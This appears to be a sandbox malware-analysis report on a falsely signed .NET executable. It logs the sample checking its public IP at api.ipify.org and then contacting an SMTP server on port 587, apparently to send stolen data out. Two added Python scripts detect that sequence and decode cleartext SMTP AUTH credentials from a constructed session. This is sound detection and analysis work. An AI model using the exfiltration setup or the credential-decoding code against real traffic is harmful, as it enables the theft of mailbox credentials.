                        • Win32 Executable (generic) a (10002005/4) 49.96%
                        • Win16/32 Executable Delphi generic (2074/23) 0.01%
                        • Generic Win/DOS Executable (2004/3) 0.01%
                        • DOS Executable Generic (2002/1) 0.01%
                        File name:SMBKT-20242005.exe
                        File size:751'112 bytes
                        MD5:52cd4c12a51d55526ceaa5f1e7f9e549
                        SHA1:6ca86a42d595177b554b82b5ea3a8dd40d1c3280
                        SHA256:c501ebcf488c9172ef490e70c37adb5926783f3aac132e8ff58f90b6b3232e03
                        SHA512:285b4be0a187e86316b0335e5b587dffb23b77952afef1f48a879b567e602a6abbada2c7cd65a02f4afb2f532e2912b446849255b9d2e70448ab6e0cc5ceffe4
                        SSDEEP:12288:q3nKIhswVenAJnEorRImS5INcHSXh6+QrDpLh/xWBdEhApcVXf2kR:4nKLmeYBWGcHMgFhZWBnsV
                        TLSH:60F4230687BD6F1BD7F9677288E1D0098FF264896221D69E7EC110D31ED6B44AB01F8B
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7Kf.................6...........U... ........@.. ....................................@................................
                        Icon Hash:00928e8e8686b000
                        Entrypoint:0x4b551e
                        Entrypoint Section:.text
                        Digitally signed:true
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Time Stamp:0x664B37EA [Mon May 20 11:45:46 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                        Signature Valid:false
                        Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                        Signature Validation Error:The digital signature of the object did not verify
                        Error Number:-2146869232
                        Not Before, Not After
                        • 13/11/2018 00:00:00 08/11/2021 23:59:59
                        Subject Chain
                        • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                        Version:3
                        Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                        Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                        Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                        Serial:7C1118CBBADC95DA3752C46E47A27438
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
(the line above repeats for the remainder of the listing: the bytes following the jmp are zero padding, which the disassembler decodes as add byte ptr [eax], al)
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb54c4 | 0x57 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb6000 | 0x600 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xb4000 | 0x3608 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb8000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xb3524 | 0xb3600 | 8f2864563c3b314a2ba1b162239976d0 | False | 0.9646763392857143 | data | 7.957426352792891 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xb6000 | 0x600 | 0x600 | b146891dd717b61da6f53a87523710ee | False | 0.4270833333333333 | data | 4.080006700599184 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xb8000 | 0xc | 0x200 | f3892d1d62724674fbbf8715036c2145 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xb6090 | 0x2f8 | data | | | 0.45921052631578946
RT_MANIFEST | 0xb6398 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 21, 2024 13:45:30.219183922 CEST | 49710 | 443 | 192.168.2.9 | 104.26.13.205
May 21, 2024 13:45:30.219278097 CEST | 443 | 49710 | 104.26.13.205 | 192.168.2.9
May 21, 2024 13:45:30.219367027 CEST | 49710 | 443 | 192.168.2.9 | 104.26.13.205
May 21, 2024 13:45:30.226900101 CEST | 49710 | 443 | 192.168.2.9 | 104.26.13.205
May 21, 2024 13:45:30.226934910 CEST | 443 | 49710 | 104.26.13.205 | 192.168.2.9
May 21, 2024 13:45:30.800045967 CEST | 443 | 49710 | 104.26.13.205 | 192.168.2.9
May 21, 2024 13:45:30.800131083 CEST | 49710 | 443 | 192.168.2.9 | 104.26.13.205
May 21, 2024 13:45:30.805169106 CEST | 49710 | 443 | 192.168.2.9 | 104.26.13.205
May 21, 2024 13:45:30.805224895 CEST | 443 | 49710 | 104.26.13.205 | 192.168.2.9
May 21, 2024 13:45:30.805771112 CEST | 443 | 49710 | 104.26.13.205 | 192.168.2.9
May 21, 2024 13:45:30.856681108 CEST | 49710 | 443 | 192.168.2.9 | 104.26.13.205
May 21, 2024 13:45:30.886470079 CEST | 49710 | 443 | 192.168.2.9 | 104.26.13.205
May 21, 2024 13:45:30.932117939 CEST | 443 | 49710 | 104.26.13.205 | 192.168.2.9
May 21, 2024 13:45:31.055871010 CEST | 443 | 49710 | 104.26.13.205 | 192.168.2.9
May 21, 2024 13:45:31.056036949 CEST | 443 | 49710 | 104.26.13.205 | 192.168.2.9
May 21, 2024 13:45:31.056171894 CEST | 49710 | 443 | 192.168.2.9 | 104.26.13.205
May 21, 2024 13:45:31.069188118 CEST | 49710 | 443 | 192.168.2.9 | 104.26.13.205
May 21, 2024 13:45:31.785428047 CEST | 49712 | 587 | 192.168.2.9 | 212.44.102.65
May 21, 2024 13:45:31.841042042 CEST | 587 | 49712 | 212.44.102.65 | 192.168.2.9
May 21, 2024 13:45:31.841154099 CEST | 49712 | 587 | 192.168.2.9 | 212.44.102.65
May 21, 2024 13:45:32.722377062 CEST | 587 | 49712 | 212.44.102.65 | 192.168.2.9
May 21, 2024 13:45:32.722567081 CEST | 49712 | 587 | 192.168.2.9 | 212.44.102.65
May 21, 2024 13:45:32.736687899 CEST | 587 | 49712 | 212.44.102.65 | 192.168.2.9
May 21, 2024 13:45:32.925565004 CEST | 587 | 49712 | 212.44.102.65 | 192.168.2.9
May 21, 2024 13:45:32.925744057 CEST | 49712 | 587 | 192.168.2.9 | 212.44.102.65
May 21, 2024 13:45:32.930850029 CEST | 587 | 49712 | 212.44.102.65 | 192.168.2.9
May 21, 2024 13:45:33.125586987 CEST | 587 | 49712 | 212.44.102.65 | 192.168.2.9
May 21, 2024 13:45:33.169106960 CEST | 49712 | 587 | 192.168.2.9 | 212.44.102.65
May 21, 2024 13:45:33.236957073 CEST | 49713 | 443 | 192.168.2.9 | 104.26.13.205
May 21, 2024 13:45:33.237035036 CEST | 443 | 49713 | 104.26.13.205 | 192.168.2.9
May 21, 2024 13:45:33.237241030 CEST | 49713 | 443 | 192.168.2.9 | 104.26.13.205
May 21, 2024 13:45:33.241331100 CEST | 49713 | 443 | 192.168.2.9 | 104.26.13.205
May 21, 2024 13:45:33.241369009 CEST | 443 | 49713 | 104.26.13.205 | 192.168.2.9
May 21, 2024 13:45:33.731309891 CEST | 443 | 49713 | 104.26.13.205 | 192.168.2.9
May 21, 2024 13:45:33.731403112 CEST | 49713 | 443 | 192.168.2.9 | 104.26.13.205
May 21, 2024 13:45:33.733197927 CEST | 49713 | 443 | 192.168.2.9 | 104.26.13.205
May 21, 2024 13:45:33.733237028 CEST | 443 | 49713 | 104.26.13.205 | 192.168.2.9
May 21, 2024 13:45:33.733583927 CEST | 443 | 49713 | 104.26.13.205 | 192.168.2.9
May 21, 2024 13:45:33.767318010 CEST | 49712 | 587 | 192.168.2.9 | 212.44.102.65
May 21, 2024 13:45:33.794280052 CEST | 49713 | 443 | 192.168.2.9 | 104.26.13.205
May 21, 2024 13:45:33.836127996 CEST | 443 | 49713 | 104.26.13.205 | 192.168.2.9
May 21, 2024 13:45:33.971215963 CEST | 443 | 49713 | 104.26.13.205 | 192.168.2.9
May 21, 2024 13:45:33.971842051 CEST | 443 | 49713 | 104.26.13.205 | 192.168.2.9
May 21, 2024 13:45:33.971901894 CEST | 49713 | 443 | 192.168.2.9 | 104.26.13.205
May 21, 2024 13:45:33.974024057 CEST | 49713 | 443 | 192.168.2.9 | 104.26.13.205
May 21, 2024 13:45:34.498406887 CEST | 49716 | 587 | 192.168.2.9 | 212.44.102.65
May 21, 2024 13:45:34.506289005 CEST | 587 | 49716 | 212.44.102.65 | 192.168.2.9
May 21, 2024 13:45:34.506362915 CEST | 49716 | 587 | 192.168.2.9 | 212.44.102.65
May 21, 2024 13:45:35.102060080 CEST | 587 | 49716 | 212.44.102.65 | 192.168.2.9
May 21, 2024 13:45:35.102263927 CEST | 49716 | 587 | 192.168.2.9 | 212.44.102.65
May 21, 2024 13:45:35.107146978 CEST | 587 | 49716 | 212.44.102.65 | 192.168.2.9
May 21, 2024 13:45:35.302222013 CEST | 587 | 49716 | 212.44.102.65 | 192.168.2.9
May 21, 2024 13:45:35.303137064 CEST | 49716 | 587 | 192.168.2.9 | 212.44.102.65
                        May 21, 2024 13:45:35.356950998 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:35.506542921 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:35.507210970 CEST49716587192.168.2.9212.44.102.65
                        May 21, 2024 13:45:35.512511969 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:35.714023113 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:35.714044094 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:35.714185953 CEST49716587192.168.2.9212.44.102.65
                        May 21, 2024 13:45:35.717343092 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:35.717355013 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:35.717416048 CEST49716587192.168.2.9212.44.102.65
                        May 21, 2024 13:45:35.734257936 CEST49716587192.168.2.9212.44.102.65
                        May 21, 2024 13:45:35.828978062 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:35.972925901 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:35.979861021 CEST49716587192.168.2.9212.44.102.65
                        May 21, 2024 13:45:35.984785080 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:36.177222013 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:36.178621054 CEST49716587192.168.2.9212.44.102.65
                        May 21, 2024 13:45:36.183584929 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:36.375930071 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:36.377028942 CEST49716587192.168.2.9212.44.102.65
                        May 21, 2024 13:45:36.381953001 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:36.609577894 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:36.610035896 CEST49716587192.168.2.9212.44.102.65
                        May 21, 2024 13:45:36.614994049 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:36.807090998 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:36.807439089 CEST49716587192.168.2.9212.44.102.65
                        May 21, 2024 13:45:36.821430922 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:37.071655989 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:37.071993113 CEST49716587192.168.2.9212.44.102.65
                        May 21, 2024 13:45:37.076914072 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:37.268383026 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:37.269121885 CEST49716587192.168.2.9212.44.102.65
                        May 21, 2024 13:45:37.269212961 CEST49716587192.168.2.9212.44.102.65
                        May 21, 2024 13:45:37.269247055 CEST49716587192.168.2.9212.44.102.65
                        May 21, 2024 13:45:37.269275904 CEST49716587192.168.2.9212.44.102.65
                        May 21, 2024 13:45:37.274085045 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:37.324959993 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:37.324969053 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:37.324978113 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:37.617010117 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:37.669178009 CEST49716587192.168.2.9212.44.102.65
                        May 21, 2024 13:47:14.528971910 CEST49716587192.168.2.9212.44.102.65
                        May 21, 2024 13:47:14.536735058 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:47:14.729302883 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:47:14.730031013 CEST49716587192.168.2.9212.44.102.65
                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        May 21, 2024 13:45:30.185522079 CEST | 65211 | 53 | 192.168.2.9 | 1.1.1.1
                        May 21, 2024 13:45:30.196038008 CEST | 53 | 65211 | 1.1.1.1 | 192.168.2.9
                        May 21, 2024 13:45:31.670753002 CEST | 50334 | 53 | 192.168.2.9 | 1.1.1.1
                        May 21, 2024 13:45:31.784424067 CEST | 53 | 50334 | 1.1.1.1 | 192.168.2.9

                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                        May 21, 2024 13:45:30.185522079 CEST | 192.168.2.9 | 1.1.1.1 | 0x793c | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
                        May 21, 2024 13:45:31.670753002 CEST | 192.168.2.9 | 1.1.1.1 | 0xba83 | Standard query (0) | mail.stilbo.eu | A (IP address) | IN (0x0001) | false

                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                        May 21, 2024 13:45:30.196038008 CEST | 1.1.1.1 | 192.168.2.9 | 0x793c | No error (0) | api.ipify.org |  | 104.26.13.205 | A (IP address) | IN (0x0001) | false
                        May 21, 2024 13:45:30.196038008 CEST | 1.1.1.1 | 192.168.2.9 | 0x793c | No error (0) | api.ipify.org |  | 104.26.12.205 | A (IP address) | IN (0x0001) | false
                        May 21, 2024 13:45:30.196038008 CEST | 1.1.1.1 | 192.168.2.9 | 0x793c | No error (0) | api.ipify.org |  | 172.67.74.152 | A (IP address) | IN (0x0001) | false
                        May 21, 2024 13:45:31.784424067 CEST | 1.1.1.1 | 192.168.2.9 | 0xba83 | No error (0) | mail.stilbo.eu |  | 212.44.102.65 | A (IP address) | IN (0x0001) | false
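The packet rows in this report are table cells that text extraction ran together, so ports and addresses have to be cut apart before the capture can be analysed, and the cut is ambiguous on its own (the digits of "192.168.2.9212.44.102.65" also split as 192.168.2.92 and 12.44.102.65). The script below is an added example, not part of the Joe Sandbox report: it recovers the columns by anchoring on the analysis VM address 192.168.2.9 (the Source IP of the HTTP sessions further down), groups packets into flows, and flags the order of events this capture shows, a TLS connection to the external-IP lookup service followed within a 30 second window (an assumed threshold) by an SMTP submission connection on tcp/587. The nine ROWS are copied from the TCP and UDP tables above.

```python
"""Recover the columns of run-together sandbox packet rows and check for the
ip-lookup-then-SMTP sequence. Added example; SANDBOX_HOST is the analysis VM
address from the HTTP session table, ROWS are copied from the packet tables."""
import re
from datetime import datetime, timedelta

SANDBOX_HOST = "192.168.2.9"   # analysis VM, listed as Source IP in the HTTP sessions
OCTET = r"(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)"
IPV4 = re.compile(rf"^(?:{OCTET}\.){{3}}{OCTET}$")
ROW = re.compile(r"^(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d\d:\d\d:\d\d)\.(?P<frac>\d+) "
                 r"[A-Z]{3,4}(?P<rest>\d[\d.]*)$")

# Nine rows copied from the TCP and UDP tables (timestamp, ports and addresses run together).
ROWS = [
    "May 21, 2024 13:45:30.185522079 CEST6521153192.168.2.91.1.1.1",
    "May 21, 2024 13:45:30.196038008 CEST53652111.1.1.1192.168.2.9",
    "May 21, 2024 13:45:30.805771112 CEST44349710104.26.13.205192.168.2.9",
    "May 21, 2024 13:45:30.856681108 CEST49710443192.168.2.9104.26.13.205",
    "May 21, 2024 13:45:31.785428047 CEST49712587192.168.2.9212.44.102.65",
    "May 21, 2024 13:45:31.841042042 CEST58749712212.44.102.65192.168.2.9",
    "May 21, 2024 13:45:33.236957073 CEST49713443192.168.2.9104.26.13.205",
    "May 21, 2024 13:45:34.498406887 CEST49716587192.168.2.9212.44.102.65",
    "May 21, 2024 13:47:14.528971910 CEST49716587192.168.2.9212.44.102.65",
]


def _ip_splits(s):
    """Every cut of s into two strict dotted quads (each at least 7 characters)."""
    return [(s[:m], s[m:]) for m in range(7, len(s) - 6)
            if IPV4.match(s[:m]) and IPV4.match(s[m:])]


def parse_row(row, local=SANDBOX_HOST):
    """Split 'Timestamp<src port><dst port><src ip><dst ip>' back into fields.

    Each candidate cut must satisfy what a sandbox capture guarantees: one endpoint
    is the analysis VM, its port is ephemeral (>= 49152) and the other port is a
    service port (< 1024). Exactly one cut may survive; otherwise raise, don't guess.
    """
    m = ROW.match(row.strip())
    if not m:
        raise ValueError(f"unrecognised row: {row!r}")
    ts = datetime.strptime(m["ts"], "%b %d, %Y %H:%M:%S").replace(
        microsecond=int(m["frac"][:6].ljust(6, "0")))   # report has nanoseconds, keep microseconds
    rest = m["rest"]
    found = []
    for i in range(1, 6):                       # src port: 1-5 digits, no leading zero
        for j in range(i + 1, i + 6):           # dst port: 1-5 digits, no leading zero
            sp, dp = rest[:i], rest[i:j]
            if not (sp.isdigit() and dp.isdigit()) or sp[0] == "0" or dp[0] == "0":
                continue
            if not (1 <= int(sp) <= 65535 and 1 <= int(dp) <= 65535):
                continue
            for sip, dip in _ip_splits(rest[j:]):
                if sip == local:
                    local_port, remote_port = int(sp), int(dp)
                elif dip == local:
                    local_port, remote_port = int(dp), int(sp)
                else:
                    continue
                if local_port >= 49152 and remote_port < 1024:
                    found.append({"ts": ts, "src_port": int(sp), "dst_port": int(dp),
                                  "src_ip": sip, "dst_ip": dip})
    if len(found) != 1:
        raise ValueError(f"{len(found)} plausible cuts for {row!r}")
    return found[0]


def flows(rows, local=SANDBOX_HOST):
    """Aggregate packets into (remote ip, remote port) flows: first-seen time and packet count."""
    table = {}
    for p in (parse_row(r, local) for r in rows):
        remote = (p["dst_ip"], p["dst_port"]) if p["src_ip"] == local else (p["src_ip"], p["src_port"])
        f = table.setdefault(remote, {"first": p["ts"], "packets": 0})
        f["first"] = min(f["first"], p["ts"])
        f["packets"] += 1
    return table


def smtp_after_ip_check(flow_table, ip_check_addrs, window=timedelta(seconds=30)):
    """AgentTesla-style exfil pattern: a TLS connection to an external-IP service followed
    within `window` by an SMTP submission (tcp/587) connection to another host.
    Returns the (remote ip, remote port) of the first such SMTP flow, or None."""
    checks = [f["first"] for (ip, port), f in flow_table.items()
              if ip in ip_check_addrs and port == 443]
    for (ip, port), f in sorted(flow_table.items(), key=lambda kv: kv[1]["first"]):
        if port == 587 and any(timedelta(0) <= f["first"] - c <= window for c in checks):
            return (ip, port)
    return None


if __name__ == "__main__":
    table = flows(ROWS)
    for remote, f in sorted(table.items(), key=lambda kv: kv[1]["first"]):
        print(f"{f['first'].time()}  {remote[0]}:{remote[1]}  packets={f['packets']}")
    print("ip-check then SMTP:", smtp_after_ip_check(table, {"104.26.13.205"}))
```

Rows for which no cut, or more than one, satisfies the constraints raise ValueError instead of being guessed; a capture from a VM with another address needs `local=` set to it, and the ip_check_addrs set should come from the DNS answer table rather than being hard-coded.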
                        • api.ipify.org
                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        0 | 192.168.2.9 | 49710 | 104.26.13.205 | 443 | 7764 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-05-21 11:45:30 UTC | 155 | OUT | GET / HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                            Host: api.ipify.org
                            Connection: Keep-Alive
                        2024-05-21 11:45:31 UTC | 211 | IN | HTTP/1.1 200 OK
                            Date: Tue, 21 May 2024 11:45:31 GMT
                            Content-Type: text/plain
                            Content-Length: 12
                            Connection: close
                            Vary: Origin
                            CF-Cache-Status: DYNAMIC
                            Server: cloudflare
                            CF-RAY: 887452185b141a0f-EWR
                        2024-05-21 11:45:31 UTC | 12 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35
                            Data Ascii: 8.46.123.175


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        1 | 192.168.2.9 | 49713 | 104.26.13.205 | 443 | 8092 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-05-21 11:45:33 UTC | 155 | OUT | GET / HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                            Host: api.ipify.org
                            Connection: Keep-Alive
                        2024-05-21 11:45:33 UTC | 211 | IN | HTTP/1.1 200 OK
                            Date: Tue, 21 May 2024 11:45:33 GMT
                            Content-Type: text/plain
                            Content-Length: 12
                            Connection: close
                            Vary: Origin
                            CF-Cache-Status: DYNAMIC
                            Server: cloudflare
                            CF-RAY: 8874522a8f2f8c78-EWR
                        2024-05-21 11:45:33 UTC | 12 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35
                            Data Ascii: 8.46.123.175


                        Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                        May 21, 2024 13:45:32.722377062 CEST | 587 | 49712 | 212.44.102.65 | 192.168.2.9 | 220-rcp-9.controlpanel.si ESMTP Exim 4.96.2 #2 Tue, 21 May 2024 13:45:32 +0200
                            220-We do not authorize the use of this system to transport unsolicited,
                            220 and/or bulk e-mail.
                        May 21, 2024 13:45:32.722567081 CEST | 49712 | 587 | 192.168.2.9 | 212.44.102.65 | EHLO 878411
                        May 21, 2024 13:45:32.925565004 CEST | 587 | 49712 | 212.44.102.65 | 192.168.2.9 | 250-rcp-9.controlpanel.si Hello 878411 [8.46.123.175]
                            250-SIZE 52428800
                            250-8BITMIME
                            250-PIPELINING
                            250-PIPECONNECT
                            250-AUTH PLAIN LOGIN
                            250-STARTTLS
                            250 HELP
                        May 21, 2024 13:45:32.925744057 CEST | 49712 | 587 | 192.168.2.9 | 212.44.102.65 | STARTTLS
                        May 21, 2024 13:45:33.125586987 CEST | 587 | 49712 | 212.44.102.65 | 192.168.2.9 | 220 TLS go ahead
                        May 21, 2024 13:45:35.102060080 CEST | 587 | 49716 | 212.44.102.65 | 192.168.2.9 | 220-rcp-9.controlpanel.si ESMTP Exim 4.96.2 #2 Tue, 21 May 2024 13:45:34 +0200
                            220-We do not authorize the use of this system to transport unsolicited,
                            220 and/or bulk e-mail.
                        May 21, 2024 13:45:35.102263927 CEST | 49716 | 587 | 192.168.2.9 | 212.44.102.65 | EHLO 878411
                        May 21, 2024 13:45:35.302222013 CEST | 587 | 49716 | 212.44.102.65 | 192.168.2.9 | 250-rcp-9.controlpanel.si Hello 878411 [8.46.123.175]
                            250-SIZE 52428800
                            250-8BITMIME
                            250-PIPELINING
                            250-PIPECONNECT
                            250-AUTH PLAIN LOGIN
                            250-STARTTLS
                            250 HELP
                        May 21, 2024 13:45:35.303137064 CEST | 49716 | 587 | 192.168.2.9 | 212.44.102.65 | STARTTLS
                        May 21, 2024 13:45:35.506542921 CEST | 587 | 49716 | 212.44.102.65 | 192.168.2.9 | 220 TLS go ahead
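Both SMTP sessions end at "220 TLS go ahead" because everything the client sends afterwards, the AUTH exchange, the envelope and the message body, travels inside TLS; the mailbox credentials are therefore not recoverable from this capture and have to come from the extracted configuration or from memory. The script below is an added example rather than report tooling: it walks the plaintext part of the session as transcribed above (REPORT_SESSION) and pulls out the server banner, the EHLO name, the public address the server echoed back and the advertised AUTH mechanisms. CLEARTEXT_SESSION is a constructed variant in which the client authenticates before STARTTLS; for that case the same walk recovers the PLAIN (or LOGIN) credentials such a session leaks. The user name and password in the constructed session are placeholders.

```python
"""Walk the plaintext part of an SMTP submission session and report what it exposes.
Added example; REPORT_SESSION is transcribed from the first session in the SMTP table,
CLEARTEXT_SESSION is a constructed variant that authenticates before STARTTLS."""
import base64
import re

REPORT_SESSION = [  # ("C"lient or "S"erver, line)
    ("S", "220-rcp-9.controlpanel.si ESMTP Exim 4.96.2 #2 Tue, 21 May 2024 13:45:32 +0200"),
    ("S", "220-We do not authorize the use of this system to transport unsolicited,"),
    ("S", "220 and/or bulk e-mail."),
    ("C", "EHLO 878411"),
    ("S", "250-rcp-9.controlpanel.si Hello 878411 [8.46.123.175]"),
    ("S", "250-SIZE 52428800"),
    ("S", "250-8BITMIME"),
    ("S", "250-PIPELINING"),
    ("S", "250-PIPECONNECT"),
    ("S", "250-AUTH PLAIN LOGIN"),
    ("S", "250-STARTTLS"),
    ("S", "250 HELP"),
    ("C", "STARTTLS"),
    ("S", "220 TLS go ahead"),
]

# Constructed: same server greeting, but the client sends AUTH PLAIN on the cleartext channel.
CLEARTEXT_SESSION = REPORT_SESSION[:12] + [
    ("C", "AUTH PLAIN " + base64.b64encode(b"\0user@example.com\0Passw0rd!").decode()),
    ("S", "235 Authentication succeeded"),
    ("C", "MAIL FROM:<user@example.com>"),
]


def decode_plain(b64):
    """SASL PLAIN initial response: [authzid] NUL authcid NUL password."""
    parts = base64.b64decode(b64).decode("utf-8", "replace").split("\0")
    return parts[-2], parts[-1]


def summarize(session):
    info = {"server": None, "ehlo_name": None, "client_public_ip": None, "auth_mechs": [],
            "starttls_offered": False, "tls_started": False, "cleartext_credentials": None,
            "opaque_lines": 0}
    last_verb = None
    login_fields = None          # collects the base64 lines of an AUTH LOGIN exchange
    for who, line in session:
        if info["tls_started"]:
            info["opaque_lines"] += 1    # from here on the capture holds TLS records, not SMTP
            continue
        if who == "C":
            if login_fields is not None:
                login_fields.append(base64.b64decode(line).decode("utf-8", "replace"))
                if len(login_fields) == 2:
                    info["cleartext_credentials"] = tuple(login_fields)
                    login_fields = None
                continue
            parts = line.split()
            if not parts:
                continue
            last_verb = parts[0].upper()
            if last_verb in ("EHLO", "HELO") and len(parts) > 1:
                info["ehlo_name"] = parts[1]
            elif last_verb == "AUTH" and len(parts) > 1:
                mech = parts[1].upper()
                if mech == "PLAIN" and len(parts) > 2:
                    info["cleartext_credentials"] = decode_plain(parts[2])
                elif mech == "LOGIN":     # optional initial response carries the user name
                    login_fields = ([base64.b64decode(parts[2]).decode("utf-8", "replace")]
                                    if len(parts) > 2 else [])
        else:
            code, text = line[:3], line[4:]
            if code == "220" and info["server"] is None:
                info["server"] = text                       # banner: host name and MTA software
            elif code == "220" and last_verb == "STARTTLS":
                info["tls_started"] = True
            elif code == "250" and last_verb in ("EHLO", "HELO"):
                ip = re.search(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]", text)
                if ip and info["client_public_ip"] is None:
                    info["client_public_ip"] = ip.group(1)   # egress address as seen by the server
                if text.upper().startswith("AUTH "):
                    info["auth_mechs"] = text.split()[1:]
                if text.upper() == "STARTTLS":
                    info["starttls_offered"] = True
    return info


if __name__ == "__main__":
    for name, session in (("report", REPORT_SESSION), ("constructed cleartext", CLEARTEXT_SESSION)):
        print(name, summarize(session))
```

For the report session the result carries the Exim banner, the EHLO name 878411, the echoed egress address 8.46.123.175 (the same value api.ipify.org returned) and the mechanisms PLAIN and LOGIN, with no credentials; only the constructed session yields a user name and password.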


                        Target ID:1
                        Start time:07:45:26
                        Start date:21/05/2024
                        Path:C:\Users\user\Desktop\SMBKT-20242005.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\SMBKT-20242005.exe"
                        Imagebase:0x970000
                        File size:751'112 bytes
                        MD5 hash:52CD4C12A51D55526CEAA5F1E7F9E549
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
